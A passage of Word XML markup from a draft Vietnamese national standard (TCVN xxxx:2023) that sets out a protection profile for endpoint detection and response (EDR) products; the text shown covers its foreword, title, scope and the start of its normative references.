        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>46</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54972228" w14:textId="73F34FCC" w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidRDefault="00B1283F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:eastAsia="MS Mincho" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:sectPr w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidSect="0069298D">
          <w:headerReference w:type="even" r:id="rId19"/>
          <w:headerReference w:type="default" r:id="rId20"/>
          <w:footerReference w:type="even" r:id="rId21"/>
          <w:footerReference w:type="default" r:id="rId22"/>
          <w:headerReference w:type="first" r:id="rId23"/>
          <w:footerReference w:type="first" r:id="rId24"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1134" w:right="680" w:bottom="1134" w:left="1134" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0F14F4" w14:textId="77777777" w:rsidR="008A4EDE" w:rsidRPr="00204C5F" w:rsidRDefault="008A4EDE" w:rsidP="00BD2F41"/>
    <w:p w14:paraId="4FA393BB" w14:textId="77777777" w:rsidR="008A4EDE" w:rsidRPr="00204C5F" w:rsidRDefault="008A4EDE" w:rsidP="00BD2F41"/>
    <w:p w14:paraId="51674486" w14:textId="6D6E0455" w:rsidR="002E5D91" w:rsidRPr="00204C5F" w:rsidRDefault="00894438" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251655168" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2D4C6327" wp14:editId="76452423">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-135255</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>529590</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4930140" cy="2751455"/>
                <wp:effectExtent l="381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275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6F059" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRPr="0069298D" w:rsidRDefault="00204C5F" w:rsidP="0069298D">
                            <w:pPr>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="1"/>
                              </w:numPr>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="0069298D">
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t>Lời nói đầu</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3CFF772D" w14:textId="28CA1C79" w:rsidR="00204C5F" w:rsidRDefault="00204C5F" w:rsidP="00B2298D">
                            <w:pPr>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="1"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                              <w:t>TCVN xxxx:2023 được xây dựng dựa trên cơ sở tham khảo</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00B2298D">
                              <w:rPr>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                              <w:t xml:space="preserve">“Protection Profile module for Endpoint Detection and Response (EDR)” </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00B2298D">
                              <w:rPr>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                              <w:t xml:space="preserve">của </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                              <w:t>Hiệp hội đảm bảo thông tin quốc gia của Hoa Kỳ</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00B2298D">
                              <w:rPr>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                              <w:t>(NIAP)</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00B2298D">
                              <w:rPr>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                              <w:t xml:space="preserve">, phiên bản </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                              <w:t>1.0, ngày 23/10/2020</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00B2298D">
                              <w:rPr>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                              <w:t>.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2F8BC21B" w14:textId="1CA2D11F" w:rsidR="00204C5F" w:rsidRPr="0069298D" w:rsidRDefault="00204C5F" w:rsidP="0069298D">
                            <w:pPr>
                              <w:pStyle w:val="BodyText"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="1"/>
                              </w:numPr>
                              <w:spacing w:before="120" w:after="0" w:line="360" w:lineRule="auto"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                              <w:t>TCVN xxxx:2023 do Cục An toàn thông tin biên soạn, Bộ Thông tin và Truyền thông đề nghị, Tổng cục Tiêu chuẩn Đo lường Chất lượng thẩm định, Bộ Khoa học và Công nghệ công bố.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D4C6327" id="Text Box 2" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-10.65pt;margin-top:41.7pt;width:388.2pt;height:216.6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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="7AC6F059" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRPr="0069298D" w:rsidRDefault="00204C5F" w:rsidP="0069298D">
                      <w:pPr>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="1"/>
                        </w:numPr>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="0069298D">
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t>Lời nói đầu</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3CFF772D" w14:textId="28CA1C79" w:rsidR="00204C5F" w:rsidRDefault="00204C5F" w:rsidP="00B2298D">
                      <w:pPr>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="1"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t>TCVN xxxx:2023 được xây dựng dựa trên cơ sở tham khảo</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B2298D">
                        <w:rPr>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t xml:space="preserve">“Protection Profile module for Endpoint Detection and Response (EDR)” </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B2298D">
                        <w:rPr>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t xml:space="preserve">của </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t>Hiệp hội đảm bảo thông tin quốc gia của Hoa Kỳ</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B2298D">
                        <w:rPr>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t>(NIAP)</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B2298D">
                        <w:rPr>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t xml:space="preserve">, phiên bản </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t>1.0, ngày 23/10/2020</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B2298D">
                        <w:rPr>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t>.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2F8BC21B" w14:textId="1CA2D11F" w:rsidR="00204C5F" w:rsidRPr="0069298D" w:rsidRDefault="00204C5F" w:rsidP="0069298D">
                      <w:pPr>
                        <w:pStyle w:val="BodyText"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="1"/>
                        </w:numPr>
                        <w:spacing w:before="120" w:after="0" w:line="360" w:lineRule="auto"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t>TCVN xxxx:2023 do Cục An toàn thông tin biên soạn, Bộ Thông tin và Truyền thông đề nghị, Tổng cục Tiêu chuẩn Đo lường Chất lượng thẩm định, Bộ Khoa học và Công nghệ công bố.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008A4EDE" w:rsidRPr="00204C5F">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="66849872" wp14:editId="5588504B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-161925</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-492125</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2108200" cy="349250"/>
                <wp:effectExtent l="12700" t="10160" r="12700" b="120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49250"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="2FA17E7E" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRDefault="00204C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6849872" id="_x0000_s1029" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-12.75pt;margin-top:-38.75pt;width:166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" strokecolor="white">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2FA17E7E" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRDefault="00204C5F"/>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BCAF7C" w14:textId="349E3787" w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidRDefault="00A41035" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="426C5FB4" wp14:editId="697D3791">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-229781</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-523993</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2264734" cy="1403985"/>
                <wp:effectExtent l="0" t="0" r="254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734" cy="1403985"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="25E1AC8B" w14:textId="398C9D40" w:rsidR="00204C5F" w:rsidRDefault="00204C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426C5FB4" id="_x0000_s1030" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-18.1pt;margin-top:-41.25pt;width:178.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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="25E1AC8B" w14:textId="398C9D40" w:rsidR="00204C5F" w:rsidRDefault="00204C5F"/>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA4E39E" w14:textId="211EC5FD" w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidRDefault="00B1283F" w:rsidP="00BD2F41"/>
    <w:p w14:paraId="56BCE763" w14:textId="77777777" w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidRDefault="00B1283F" w:rsidP="00BD2F41"/>
    <w:p w14:paraId="28059A48" w14:textId="77777777" w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidRDefault="00B1283F" w:rsidP="00BD2F41"/>
    <w:p w14:paraId="79FC8369" w14:textId="77777777" w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidRDefault="00B1283F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:sectPr w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidSect="0069298D">
          <w:headerReference w:type="even" r:id="rId25"/>
          <w:headerReference w:type="default" r:id="rId26"/>
          <w:footerReference w:type="even" r:id="rId27"/>
          <w:footerReference w:type="default" r:id="rId28"/>
          <w:headerReference w:type="first" r:id="rId29"/>
          <w:footerReference w:type="first" r:id="rId30"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1134" w:right="680" w:bottom="1134" w:left="1134" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="674A4961" w14:textId="040BC0EC" w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidRDefault="00894438" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251653120" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="07D93FFC" wp14:editId="03C9AC37">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>729615</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6382385" cy="351155"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="largest"/>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438C1" w14:textId="3DAD4A52" w:rsidR="00204C5F" w:rsidRDefault="00204C5F" w:rsidP="0069298D">
                            <w:pPr>
                              <w:pStyle w:val="TieuchuanQG"/>
                              <w:pageBreakBefore/>
                              <w:tabs>
                                <w:tab w:val="clear" w:pos="9639"/>
                              </w:tabs>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rStyle w:val="expandstyle"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="28"/>
                              </w:rPr>
                              <w:t>T I Ê U  C H U Ẩ N  Q U Ố C  G I A</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rStyle w:val="expandstyle"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="28"/>
                              </w:rPr>
                              <w:tab/>
                              <w:t xml:space="preserve">                                TCVN xxxx:2023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D93FFC" id="Text Box 10" o:spid="_x0000_s1031" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:57.45pt;width:502.55pt;height:27.65pt;z-index:251653120;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:0;mso-wrap-distance-top:0;mso-wrap-distance-right:0;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" stroked="f">
                <v:textbox inset="2pt,2pt,2pt,2pt">
                  <w:txbxContent>
                    <w:p w14:paraId="4A3438C1" w14:textId="3DAD4A52" w:rsidR="00204C5F" w:rsidRDefault="00204C5F" w:rsidP="0069298D">
                      <w:pPr>
                        <w:pStyle w:val="TieuchuanQG"/>
                        <w:pageBreakBefore/>
                        <w:tabs>
                          <w:tab w:val="clear" w:pos="9639"/>
                        </w:tabs>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rStyle w:val="expandstyle"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="28"/>
                        </w:rPr>
                        <w:t>T I Ê U  C H U Ẩ N  Q U Ố C  G I A</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rStyle w:val="expandstyle"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="28"/>
                        </w:rPr>
                        <w:tab/>
                        <w:t xml:space="preserve">                                TCVN xxxx:2023</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" side="largest" anchory="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:bookmarkStart w:id="2" w:name="loai_1_name_name"/>
      <w:r w:rsidR="00B1283F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Công nghệ thông tin </w:t>
      </w:r>
      <w:r w:rsidR="0029647E" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00B1283F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Các kỹ thuật an toàn </w:t>
      </w:r>
      <w:r w:rsidR="0029647E" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00B1283F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hồ sơ bảo vệ </w:t>
      </w:r>
      <w:r w:rsidR="00B1283F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">cho </w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidR="00F303BE" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>sản phẩm phát hiện và phản hồi điểm cuối (EDR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EE005B" w14:textId="1ACF1AF3" w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidRDefault="00B1283F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Information Technology </w:t>
      </w:r>
      <w:r w:rsidR="0029647E" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Security techniques </w:t>
      </w:r>
      <w:r w:rsidR="0029647E" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Protection profile for </w:t>
      </w:r>
      <w:r w:rsidR="00F303BE" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Endpoint Detection and Response (EDR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70906F09" w14:textId="77777777" w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidRDefault="00B1283F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc137476352"/>
      <w:bookmarkStart w:id="4" w:name="dieu_1"/>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1 Phạm vi áp dụng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="4505183D" w14:textId="72E3D292" w:rsidR="00444156" w:rsidRPr="00204C5F" w:rsidRDefault="006F029D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="dieu_2"/>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiêu chuẩn này </w:t>
      </w:r>
      <w:r w:rsidR="00444156" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">quy định hồ sơ bảo vệ </w:t>
      </w:r>
      <w:r w:rsidR="00F303BE" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sản phẩm phát hiện và phản hồi điểm cuối (EDR)</w:t>
      </w:r>
      <w:r w:rsidR="00444156" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, thể hiện các yêu cầu chức năng an toàn </w:t>
      </w:r>
      <w:r w:rsidR="000C7D83" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">(SFR) </w:t>
      </w:r>
      <w:r w:rsidR="00444156" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">và yêu cầu đảm bảo an toàn </w:t>
      </w:r>
      <w:r w:rsidR="000C7D83" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">(SAR) </w:t>
      </w:r>
      <w:r w:rsidR="00444156" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">đối với chức năng </w:t>
      </w:r>
      <w:r w:rsidR="00F303BE" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bảo vệ</w:t>
      </w:r>
      <w:r w:rsidR="00444156" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, phù hợp với </w:t>
      </w:r>
      <w:r w:rsidR="00444156" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bộ tiêu chuẩn quốc gia TCVN 8709-1:2011 (ISO/IEC 15408-1:2009), TCVN 8709-2:2011 (ISO/IEC 15408-2:2008) và TCVN 8709-3:2011 (ISO/IEC 15408-3:2008)</w:t>
      </w:r>
      <w:r w:rsidR="00444156" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6033E5C3" w14:textId="05F9C8A7" w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidRDefault="00B1283F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc137476353"/>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2 Tài liệu viện dẫn</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="42024687" w14:textId="77777777" w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidRDefault="00B1283F" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Các tài liệu viện dẫn sau đây là cần thiết để áp dụng tiêu chuẩn này. Đối với tài liệu viện dẫn ghi năm công bố thì áp dụng phiên bản được nêu. Đối với tài liệu viện dẫn không ghi năm công bố thì áp dụng phiên bản mới nhất (bao gồm cả phiên bản sửa đổi, bổ sung).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5876F7" w14:textId="77777777" w:rsidR="002376CE" w:rsidRPr="00204C5F" w:rsidRDefault="002376CE" w:rsidP="00BD2F41">
      <w:bookmarkStart w:id="7" w:name="dieu_3"/>
